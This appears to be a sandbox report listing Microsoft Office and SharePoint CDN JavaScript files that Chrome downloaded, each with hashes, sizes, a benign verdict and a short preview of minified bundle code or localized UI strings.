                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[12906],{312906:(e,t,n)=>{n.d(t,{u:()=>A});var a=n(408156),i=n(378445),r=n(557625),o=n(250708),s=n(32687),c=n(86862),d=n(85978),l=n(834638),u=n(867437),f=n(727251),p=n(235094),m=n(281546),_=n(923047),h=n(692217),b=n(851261),g=n(663859),v=n(55928),y=n(161816),S=n(230985),D=n(878542),I=n(14813),x=n(218777),C=n(402904),O=n(550948),w=n(501544);const E=(0,O.s)({root:{mc9l5x:"fjseox",B7ck84d:"f1ewtqcl",B2u0y6b:"f132xexn",Bceei9c:"f158kwzp",Bahqtrf:"fk6fouc",Be2twd7:"fy9rknc",Bg96gwp:"fwrc4pm",Btd35i7:"fokg9q4",Bbmb7ep:["f1aa9q02","f16jpd5f"],Beyfa6y:["f16jpd5f","f1aa9q02"],B7oj6ja:["f1jar5jt","fyu767a"],Btl43ni:["fyu767a","f1jar5jt"],B4j52fo:"f5ogflp",Bekrc4i:["f1hqa2wf","finvdd3"],Bn0qgzm:"f1f09k3d",ibv6hh:["finvdd3","f1hqa2wf"],icvyot:"fzkkow9",vrafjx:["fcdblym","fjik90z"],oivjwe:"fg706s2",wvpqe5:["fjik90z","fcdblym"],g2u3we:"fghlq4f",h3c5rm:["f1gn591s","fjscplz"],B9xav0g:"fb073pr",zhjwy3:["fjscp
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (22062)
                              Category:downloaded
                              Size (bytes):63545
                              Entropy (8bit):5.060550920722275
                              Encrypted:false
                              SSDEEP:
                              MD5:D51B05584134E736A53F870813011EE9
                              SHA1:4A14CB088569D3C60F8E02F1099F9FA060C7414C
                              SHA-256:2E5355863D05C0005DB0506972A3E30EA56B6211B748DB2B5EF62FCECFF0140C
                              SHA-512:3A21789BF32EFD156DFB09837F4CA703E58C84E4759736F1F60EBAC20930E633F2BC89D659A652BF387CA276D7CDBE3B194C619E643FA3B6005B4AD5CA6C2D19
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-spo-teams-lists/de/initial.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["initial.resx"],{586:e=>{e.exports=JSON.parse('{"a":"Ein Problem ist aufgetreten","c":"Versuchen Sie, die Seite zu aktualisieren.","b":"Es ist ein Problem aufgetreten, und wir konnten die anzuzeigende Seite nicht abrufen."}')}.,1612:e=>{e.exports=JSON.parse('{"a":"Im Plastischen Reader .ffnen"}')}.,696:e=>{e.exports=JSON.parse('{"b":"Verkn.pfung zu .Meine Dateien. hinzuf.gen","d":"Verkn.pfung zu OneDrive hinzuf.gen","n":"Entfernen","p":"Verkn.pfung aus \\u0022Meine Dateien\\u0022 entfernen","y":"Aus freigegebener Liste entfernen","a":"Hinzuf.gen einer Verkn.pfung zu diesem Ordner in .Meine Dateien.","o":"Entfernen der Verkn.pfung zu diesem Ordner aus .Meine Dateien.","c":"Hinzuf.gen einer Verkn.pfung zu diesem Ordner in OneDrive","m":"Entfernen der ausgew.hlten Verkn.pfung von diesem Speicherort","f":"Verkn.pfung zu Alben hinzuf.gen","e":"Hinzuf.gen einer Verkn.pfung zu diesem fre
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (4204)
                              Category:downloaded
                              Size (bytes):5979
                              Entropy (8bit):5.117153888840185
                              Encrypted:false
                              SSDEEP:
                              MD5:B6FB42956158A52D1FBA3E6E2F9729B3
                              SHA1:4CAE4AF1F3C3BDA880FFE6DB2CB05642A2BB5B4F
                              SHA-256:686AA51FEC32A9685F2631D12F7FDAE5B66CFE9D62FD5AAB8682FFC9DB56459E
                              SHA-512:115514DDE435A7B16F9AD081AD2A1D9AC78623237BE674E3283E76D2B73A6886AA4622A17C02EB2435BC6706AB11AC385B874E424265650B14A5807E7EE7E60D
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/107.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[107],{631:(e,t,n)=>{n.r(t),n.d(t,{getAllFilters:()=>f,getAllSmartFilters:()=>u,getEffectiveFilterParams:()=>_,getFilter:()=>c,removeFilter:()=>l,removeSmartFilters:()=>m,updateFilter:()=>d});var a=n(95),i=n(1033),r=n(470),o=n(75),s=n(42);function c(e,t){var n=h(e,t);if(n){var a=i.b(n);if(a&&1===a.length&&a[0]){var r=a[0];return r.id=t,r}}}function d(e,t){if(!t.id)throw new Error("Must provide a filter with an id to use updateFilter");var n=r.a(t);if(!n)throw new Error("Filter could not be serialized");var i=h(e,t.id);if(i){var s=void 0;try{s=o.l(n).documentElement}catch(e){throw new Error("Generated filter was not valid XML!")}i.parentNode.replaceChild(s,i),e.setIsDirty(!0,a.a.filters)}else e.addFilters([n])}function l(e,t){var n=h(e,t);if(n){var i=n.parentNode;"Where"===i.tagName?e.clearFilters():(i.removeChild(n),"Or"!==i.tagName&&"And"!==i.tagName||i.parentNode.replaceChild(i.firstElementChild,i),e.setIsDi
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (22370)
                              Category:downloaded
                              Size (bytes):41566
                              Entropy (8bit):5.3472491598452185
                              Encrypted:false
                              SSDEEP:
                              MD5:F22ED4E286DAEC66E488C4B5472B6806
                              SHA1:60D33180D21D78C72CCA3F4303F64748BEDD41AE
                              SHA-256:D4C8AE0989B153F0D80101A19A532B827C2E526E0301968EC5620F3F9BDE1DCB
                              SHA-512:71A9C21878B0A4B2E1669388640FC27DE4DBD614AC80A9878660794B2940CB34F6B494EDCE3A3FAB39CE1A25C9D28D6AD78D2D2DB080C9D84A112DC72400347A
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/25.js
                              Preview:(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[25],{298:(e,t,n)=>{"use strict";n.d(t,{a:()=>l});var a=n("tslib_102"),i=n("react-lib"),r=n("fui.core_238"),o=n(5400),s=n("fui.util_150"),c=n(299),d=n(300);function l(e,t){void 0===t&&(t={});var n=t.factoryOptions,l=(void 0===n?{}:n).defaultProp,f=function(n){var c,d,l,f,p=(c=t.displayName,d=i.useContext(o.a),l=t.fields,f=["theme","styles","tokens"],s.F2.getSettings(l||f,c,d.customizations)),m=t.state;m&&(n=(0,a.W_)((0,a.W_)({},n),m(n)));var _=n.theme||p.theme,h=u(n,_,t.tokens,p.tokens,n.tokens),b=function(e,t,n){for(var a=[],i=3;i<arguments.length;i++)a[i-3]=arguments[i];return r.BPT.apply(void 0,a.map(function(a){return"function"==typeof a?a(e,t,n):a}))}(n,_,h,t.styles,p.styles,n.styles),g=(0,a.W_)((0,a.W_)({},n),{styles:b,tokens:h,_defaultStyles:b,theme:_});return e(g)};return f.displayName=t.displayName||e.name,l&&(f.create=(0,c.a)(f,{defaultProp:l})),(0,d.a)(f,t.statics),f}function u(e,t){for(var n=[],i=2;i<arguments.
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (11674)
                              Category:downloaded
                              Size (bytes):17080
                              Entropy (8bit):5.505033736199508
                              Encrypted:false
                              SSDEEP:
                              MD5:E6E53991898974D654ED855C5689BCE7
                              SHA1:DDFC3EF64C7252E040F9CD6F42DC1BD14FCADB38
                              SHA-256:B2F6F0B5977CE595175AE02E2F9BDE6480303BBD36418052CA06DBDE84FEF12D
                              SHA-512:066506C4029C2BD6BBC86167A65F4AC3D005E027288EE7EF19D8D31BFFD56EEAD05DFCE0FC14EA744817155EBDED881311442BD5BFD20351AAC7F72CFFCBEA9A
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/16.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[16],{6447:(e,t,n)=>{n.d(t,{a:()=>i,b:()=>c,c:()=>r,d:()=>o,e:()=>s,f:()=>l,g:()=>u,h:()=>d});var a=n(2698);const i=(0,a.a)("Delete20Regular","20",["M8.5 4h3a1.5 1.5 0 0 0-3 0Zm-1 0a2.5 2.5 0 0 1 5 0h5a.5.5 0 0 1 0 1h-1.05l-1.2 10.34A3 3 0 0 1 12.27 18H7.73a3 3 0 0 1-2.98-2.66L3.55 5H2.5a.5.5 0 0 1 0-1h5ZM5.74 15.23A2 2 0 0 0 7.73 17h4.54a2 2 0 0 0 1.99-1.77L15.44 5H4.56l1.18 10.23ZM8.5 7.5c.28 0 .5.22.5.5v6a.5.5 0 0 1-1 0V8c0-.28.22-.5.5-.5ZM12 8a.5.5 0 0 0-1 0v6a.5.5 0 0 0 1 0V8Z"]),r=(0,a.a)("Dismiss16Regular","16",["m2.59 2.72.06-.07a.5.5 0 0 1 .63-.06l.07.06L8 7.29l4.65-4.64a.5.5 0 0 1 .7.7L8.71 8l4.64 4.65c.18.17.2.44.06.63l-.06.07a.5.5 0 0 1-.63.06l-.07-.06L8 8.71l-4.65 4.64a.5.5 0 0 1-.7-.7L7.29 8 2.65 3.35a.5.5 0 0 1-.06-.63l.06-.07-.06.07Z"]),o=(0,a.a)("Dismiss20Regular","20",["m4.09 4.22.06-.07a.5.5 0 0 1 .63-.06l.07.06L10 9.29l5.15-5.14a.5.5 0 0 1 .63-.06l.07.06c.18.17.2.44.06.63l-.06.07L10.71 10l5
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (10506)
                              Category:downloaded
                              Size (bytes):10511
                              Entropy (8bit):5.1632144229516035
                              Encrypted:false
                              SSDEEP:
                              MD5:0F0F3A72747347EF9E13764C79960201
                              SHA1:6A1F97DE93354B3AF3840FF0F5E5FAD1ED6C76DE
                              SHA-256:B125EE1975BFFD60BCB145D21A8EC27F8D50D0DA8ABEBF88EB0790C3BBEA4C37
                              SHA-512:CC0F9AE72A661C5B3D2AFE9EA2EB05E74176E3432BDED2CF0B23F6AEC6D03C9C91EC1C091CE3309AE5B2B640105ED37E9A73A37ECD02FD0DD18106BD8FC01D97
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/103.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[103],{6257:function(e,t,n){n.d(t,{a:function(){return h},b:function(){return b}});var a,i=n("tslib_102"),r=n(23);!function(e){e[e.MalwareDetected=0]="MalwareDetected",e[e.ThisFileIsCheckedOut=1]="ThisFileIsCheckedOut",e[e.DLPBlocked=2]="DLPBlocked",e[e.MissingMetaData=3]="MissingMetaData",e[e.DLPWarning=4]="DLPWarning",e[e.AwaitingApproval=5]="AwaitingApproval",e[e.Trending=6]="Trending",e[e.New=7]="New",e[e.NeedsRepublishing=8]="NeedsRepublishing"}(a||(a={}));var o=n(1478),s=n("odsp.util_578"),c=n(14),d=n(1336),l=n(435),u=n(2608),f=s.tH.isFeatureEnabled({ODB:61055}),p=6e3,m="/_layouts/15/userphoto.aspx?size=S&accountname=",_="v2.1",h=function(){function e(e,t){this._eTagMap={},this._dataRequestor=t.vroomDataRequestor;var n=t.getProfileImageUrl,a=void 0===n?function(e){return(0,o.b)(e)}:n,i=t.caller,r=void 0===i?"hovercard":i,s=t.useSharePointApi,c=void 0!==s&&s;this._getProfileImageUrl=a,this._caller=r,this.
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1935)
                              Category:downloaded
                              Size (bytes):2421
                              Entropy (8bit):5.184414008121094
                              Encrypted:false
                              SSDEEP:
                              MD5:3180AA2A7C95DA1E5AD2E1327CECFA4B
                              SHA1:B01044E5AB7C3D046AD5F4557FF723495E14EB93
                              SHA-256:46A238CBD794BB661DD3FC0CD684451814512CF77CD978D0E9B8874C419BFBEF
                              SHA-512:647215CA80373EF73D98A67FDA3925B345CA7A2686B916786CA7AF25703ACDC9BFB7288F8B428BF0E02EBBEE8AB0FD3E67798397DF0FB9CEE03033C088DC1D57
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/21.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[21],{1408:(e,t,n)=>{n.d(t,{a:()=>i});var a=n("odsp.util_578"),i=new a.qT({name:"setValueActionHandler.key",loader:new a.g6(function(){return Promise.all([n.e("deferred.odsp-common"),n.e("deferred.odsp-datasources"),n.e("deferred"),n.e("custom-formatter.lib"),n.e("custom-formatter.lib.resx"),n.e("ondemand.resx"),n.e(235)]).then(n.bind(n,1645)).then(function(e){return e.setValueActionHandlerKey})})})}.,739:(e,t,n)=>{n.r(t),n.d(t,{CustomCommandsResourceKey:()=>f});var a=n("tslib_102"),i=n(150),r=n("odsp.util_578"),o=n(33);function s(e,t){var n=e.key;return{id:n,getCommand:function(e){return{action:t(e),name:"Custom",iconProps:{iconName:"BorderDot"},automationId:n}}}}var c=n(1408),d=new r.qT({name:"SetValueActionCommand",factory:{dependencies:{getSetValueHandler:c.a.async.lazy},create:function(e){var t=e.getSetValueHandler;return{instance:function(e){var n=function(e){var n=e.key;return function(a){var i=a.items;
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (49570)
                              Category:downloaded
                              Size (bytes):179986
                              Entropy (8bit):5.277420462626286
                              Encrypted:false
                              SSDEEP:
                              MD5:961A714730ADF8BA3B06D1EFD4A7A63A
                              SHA1:6C1849772441C5C3DD90E8160321F2FF6B283B26
                              SHA-256:864494EB84F992520BB6FADC9C347ECE32CE80E2E088BAF4C69433DC397DB7AF
                              SHA-512:99D83F49CC078B1EB1A22E7102A0BCD95C03493B21775EEA806474BD1F6CA3E4FB7F9DD1E7594597C58336E987D0B28D569668D004685D2800494D72F3CC3623
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/176.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[176],{900:(e,t,n)=>{n.d(t,{a:()=>i});var a=n(842);function i(e){return(0,a.a)(e())}}.,893:(e,t,n)=>{n.d(t,{a:()=>c,b:()=>s});var a=n(830),i=n(324),r=n(829),o=new a.a("operation",{operationTypeId:i.b,keyFacetId:i.b});function s(e){var t=e.operationTypeFacet,n=e.keyFacet;return o.serialize({operationTypeId:t.id,keyFacetId:n.id})}function c(e){var t=o.deserialize(e),n=t.keyFacetId,a=t.operationTypeId;return{keyFacet:r.a.get(n),operationTypeFacet:r.a.get(a)}}}.,894:(e,t,n)=>{n.d(t,{a:()=>l,b:()=>d,c:()=>c});var a=n("tslib_102"),i=n(829),r=n(893),o=n("odsp.util_578"),s=n(895),c=new i.a("noRegisteredHandlerError");function d(e){var t=e.operationTypeFacet,n=e.keyFacet;return new s.a({message:"There is no operation handler registered for operation type '".concat(t.id,"' of key facet '").concat(n.id,"'."),isExpected:!0,facets:(0,a.W_)({},c.pack((0,r.b)({operationTypeFacet:t,keyFacet:n})))})}var l=function(e){function
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (19679)
                              Category:downloaded
                              Size (bytes):107893
                              Entropy (8bit):5.371854598491439
                              Encrypted:false
                              SSDEEP:
                              MD5:16A8630EF8FCF512077D53C1DCBE7780
                              SHA1:152EF649CA9D66B2F560016D577F1E8E296D3FD0
                              SHA-256:61C3E48BEC59AA98E87937E8E4BE442AF4D4D1E0D8EDDFA9935295DE19117C5E
                              SHA-512:5D5A86276C749F1BB05C7752BFFDD7A3C24C2492BB7FB0CEFE0DE02FEA919B0097B39F779B698D64CD4A762238C10F0FE89FFCC33D8BAF902F6F13E0D933B34A
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/235.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[235,36],{984:(e,t,n)=>{n.r(t),n.d(t,{DataBatchOperationHelper:()=>c,default:()=>d});var a=n(51),i=n(2063),r=n(77),o=n("odsp.util_578"),s=o.HW.isActivated("2b1ee267-3309-486b-8be8-994d0fcadf3f"),c=function(){function e(){}return e.getBatchOperationUrl=function(e,t){return new i.b({webAbsoluteUrl:!e&&t?new r.a(t).authority:e}).build().segment("$batch").toString()},e.processErrorResponse=function(e,t){var n={id:t};if((e=e.error?e.error:e)&&e.code){var a=e.code?e.code.split(","):e.error.code.split(","),i=Number(a[0]),r=s||"string"!=typeof e.message?e.message.value:e.message;n.error={code:i,message:r}}return{items:[n]}},e.getBatchResponseText=function(e){var t,n,a,i=[];if(e.split("\n").length>0&&(t=e.split("\n")[0]),t){n=(e=e.replace(t.trim()+"--","")).split(t);for(var r=1;r<n.length;r++)(a=n[r].split("\n\r")).length>2&&i.push(a[2])}return i},e.processBatchResponse=function(e,t,n){var a,i,r,o,s=[],c=!1;if(e&&e.spl
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Java source, ASCII text, with CRLF, LF line terminators
                              Category:downloaded
                              Size (bytes):897
                              Entropy (8bit):5.383300120939476
                              Encrypted:false
                              SSDEEP:
                              MD5:B1177E0F4163577FA611A5649B4CBB71
                              SHA1:67CBD185632522213335A7CEDB3DC673FF721C92
                              SHA-256:91AF77E4B248F2A0FC7E5B56A6499DD07A91118EBC462773FD3BE061D7E77E1E
                              SHA-512:9801370318B95A98F8136D5969EC5132F59D619FA607B1255221D0AFC7FA2C22125FB703A32C518428937B3622B05AFBA221AC0AD62D6832D4E854D134AA366D
                              Malicious:false
                              Reputation:unknown
                              URL:"https://netorgft3648903-my.sharepoint.com/_layouts/15/odspserviceworkerproxy.aspx?swManifestName=spserviceworker&debug=false&bypass=false&applications=%5B%7B%22id%22%3A%22STS%22%2C%22swPrefetchManifestName%22%3A%22stsserviceworkerprefetch%22%7D%2C%7B%22id%22%3A%22SPHome%22%7D%2C%7B%22id%22%3A%22SitePages%22%7D%2C%7B%22id%22%3A%22Embed%22%7D%2C%7B%22id%22%3A%22CreateGroup%22%7D%2C%7B%22id%22%3A%22SingleWebPart%22%7D%2C%7B%22id%22%3A%22VivaHome%22%7D%2C%7B%22id%22%3A%22BrokerLogon%22%7D%2C%7B%22id%22%3A%22Clipchamp%22%7D%2C%7B%22id%22%3A%22MeeBridge%22%7D%5D&defaultBrotli=true&authenticateFast=true&wwData=true&prefetchFilebrowserPageInTeams=true&FUIV9Flights=[-83099649,3]&spStartApplicationWebBundle=true&enableIntegrities=true"
                              Preview:..var _startTime=performance.now(),_startTimeTicks=Date.now();.var _shouldBypass=false;.var _cdnBaseUrl='https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-12.003/';.var _swBuildNumber='odsp-web-prod_2024-04-12.003';.var _wwBuildNumber='odsp-web-prod_2024-04-12.003';.var _oneShellUrl='https://shell.cdn.office.net/api/ShellBootstrapper/business/OneShell';.var _wwKillSwitches={};.var _killSwitches={"3F488A74-ED08-4D4B-8DF3-432FBB0601F9":true,"EF43770C-872B-4783-B470-A323B23BFE56":true,"2796B66B-A748-4B93-B42F-D1F1DA8BE7CC":true};.var _prefetchBaseUrls={"stsserviceworkerprefetch":"https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/"};.importScripts('https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/stsserviceworkerprefetch/stsserviceworkerprefetch.js');.importScripts('https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-12.003/spserviceworker.js');...
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (18800)
                              Category:downloaded
                              Size (bytes):55324
                              Entropy (8bit):4.995371923875866
                              Encrypted:false
                              SSDEEP:
                              MD5:8FBBF9BEF1B49509A671A06D9D235139
                              SHA1:18147049D68279447028A12F23476ADFAB68B74A
                              SHA-256:DB5D12BFACCC01791AC5EC31CE40B136850A8B9FB05F9186FFC42895BF3EA721
                              SHA-512:7DF146514A96B54C4929451DC265F2E36BD1F422A7EF51DEAE11BF7DBE925CE0374967FC612DBC9497D51B2B757A60B12F2F633C2984CAB98C819E4E1E24BCAB
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/en-gb/deferred.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["deferred.resx"],{3394:e=>{e.exports=JSON.parse('{"a":"Something went wrong"}')}.,3818:e=>{e.exports=JSON.parse('{"a":"Open in Immersive Reader"}')}.,3434:e=>{e.exports=JSON.parse('{"b":"Add shortcut to My files","d":"Add shortcut to OneDrive","n":"Remove","p":"Remove shortcut from My files","y":"Remove from shared list","a":"Add a shortcut to this folder in My files","o":"Remove the shortcut to this folder from My files","c":"Add a shortcut to this folder in OneDrive","m":"Remove the selected shortcut from this location","f":"Add shortcut to Albums","e":"Add a shortcut to this shared album in albums","k":"Open file location","t":"Date","s":"Any date","u":"Last 24 hours","w":"Last week","v":"Last month","x":"Last year","l":"Photos","r":"Type","g":"Any Type","i":"Folders","h":"Documents","j":"Music","q":"PC Sync"}')}.,3426:e=>{e.exports=JSON.parse('{"a":"Item"}')}.,3424:e=>{e.exports=JSON.parse('{"Q":"Set curr
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (2072)
                              Category:downloaded
                              Size (bytes):2100
                              Entropy (8bit):4.753942912116292
                              Encrypted:false
                              SSDEEP:
                              MD5:7EC5652B09389F0C239CC9436A197970
                              SHA1:EBFF59A6B025AE047666949831BF003876916FAB
                              SHA-256:B01F34DDAA773DA549363956F8E2A4AE0CEBA832BE232BEED73220E78AB9E4C4
                              SHA-512:DDBC420276C305F285B0E1E7A399175525AB6BBA7D067433496AE62C0DB9D55473BBA799825858C0BC99AA257DC2FEE6F8BB87E7A5FD139F923EF97AF025EE3D
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-spo-teams-lists/es/deferred.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["deferred.resx"],{7763:e=>{e.exports=JSON.parse('{"introPageHeaderText":"Agregar Microsoft Teams","selectPageHeaderText":"Anclar recursos como pesta.as en Teams","introPageDescription1":"Incluya recursos de este sitio en Teams para colaborar en tiempo real en un solo lugar. ","introPageSecondHeader":"Teams hace que sea m.s f.cil:","introPagePoint1":"Chatear con compa.eros","introPagePoint2":"Coordinar reuniones en l.nea con partners","introPagePoint3":"Colaborar en contenido compartido","selectPageDescription":"Agregue p.ginas, listas y bibliotecas de documentos como pesta.as en Teams para que los recursos compartidos est.n f.cilmente disponibles para los colaboradores. Una vez en Teams, los recursos en pesta.as se pueden agregar, eliminar o reordenar.","continueButtonText":"Continuar","addTeamButtonText":"Agregar Teams","cancelButtonText":"Cancelar","recommended":"Recomendados","pages":"P.ginas","
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (1483)
                              Category:downloaded
                              Size (bytes):2616
                              Entropy (8bit):5.496287128560997
                              Encrypted:false
                              SSDEEP:
                              MD5:4D4288BCA0BFE15002CF21A193DA7A72
                              SHA1:1ACE6362DD69D8AB55059CCEEBAA7CCFEB767562
                              SHA-256:396E8CF83DC2BBEE4D1EF003FBB4A8F7F61C313B56AAE41B5CE57F939047413F
                              SHA-512:221C6D11889FEA2B4EBBB51E836FB6E0695B47F92438C190BB28444698B6F91796235385B5F16F5051A786904226465BC8235B5E397F0FE544F5A263E82F7307
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-spo-teams-lists/ja/deferred.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["deferred.resx"],{7763:e=>{e.exports=JSON.parse('{"introPageHeaderText":"Microsoft Teams ...","selectPageHeaderText":"Teams ...............","introPageDescription1":"....... Teams ...................... ......... 1 .............","introPageSecondHeader":"Teams ...............","introPagePoint1":".......","introPagePoint2":".................","introPagePoint3":"............","selectPageDescription":"................. ...... Teams .......................................Teams ...........................
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1276)
                              Category:downloaded
                              Size (bytes):1281
                              Entropy (8bit):5.1578209307407406
                              Encrypted:false
                              SSDEEP:
                              MD5:E6FBF4C5389A42575BC19DBACD0680CE
                              SHA1:7BE681864E6A7C52CB97B0C338664A6E3BF9D0EC
                              SHA-256:2B723C1383B2272E41F4CE933D1AED56C89DE37544FECA61AFF38EFDBFCBE197
                              SHA-512:BA07B943E84F0B7398522802F1F5FB37ED34E74D052885CF81CBC3B8042120ADB37B120042609CE3C15DED5E6DB901D14BE64FC9036C7614F950549381901965
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/1729.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1729],{4856:function(e,t,n){n.r(t),n.d(t,{resourceKey:function(){return m}});var a=n("tslib_102"),i=n(2088),r=n("odsp.util_578"),o=n(115),s=n(60),c=n(302),d=n(76),l=n(24),u=n(229),f=n(476),p=function(e){function t(t,n){void 0===t&&(t={});var a=e.call(this,t,n)||this;a._rawDataSignal=new o.a,a._itemCacheStore=n.itemCacheStore,a._pageContext=n.pageContext;var i=a._itemCacheStore.dispatch(a._getFileHandlerDataFromItemsCacheStore());return i?a.setFileHandlerData(i):a.setFileHandlerData(void 0),a}return(0,a.XJ)(t,e),t.prototype.getFileHandlerData=function(e){return this._rawDataSignal.getPromise().then(function(t){if(t)return e&&e.includePromotedApp!==t.signature.includePromotedApp?void 0:t.data})},t.prototype.setFileHandlerData=function(e){this._rawDataSignal.complete(e)},t.prototype._getFileHandlerDataFromItemsCacheStore=function(){var e=this;return function(t){var n=e._pageContext.webAbsoluteUrl,a=new d.a(n).au
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (6696)
                              Category:downloaded
                              Size (bytes):710780
                              Entropy (8bit):5.690529497103973
                              Encrypted:false
                              SSDEEP:
                              MD5:FF480C50D1F404695FF1052B5269BA97
                              SHA1:8FA74896DC22F6D19FC23B141C98BA48E40D4007
                              SHA-256:3FF01442882AAB5268E5B22ECD6B23D0F773662B8BDEE21D0A26976F562F8435
                              SHA-512:2725E1EE7E3644648416EA5B3FEC7D781B8C1A91D8FC476293B2DC883136B1882948B34ECAA6935AE4ABAD416545C4CF00059BDCF0253901CBCA6ED2EA63C0D0
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-odb-meta-os/ja/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{6473:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,7237:e=>{e.exports=JSON.parse('{"a":"A source with id
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (65536), with no line terminators
                              Category:downloaded
                              Size (bytes):636449
                              Entropy (8bit):5.313940235710146
                              Encrypted:false
                              SSDEEP:
                              MD5:ADB01C7605861F7F687BC90424831EF6
                              SHA1:20736A3A668E1CEC438BA05EF3DEA8A4228DB420
                              SHA-256:BA85E52AAEA02F18FFDDCDC56E5B3D5A7B2E5C533394624552A40E220246B0C9
                              SHA-512:37505558E6C6D113F623C7039FD7CEB8961C72BB18584C8F1E7E80BD5316F8573EC8AA61124DF217D642200EA7A45DE2E017302F6E0138A3F5B59F50583E8A63
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/sp-client/odsp.fluentui.legacy.components/fui.lco-28c6d583.js
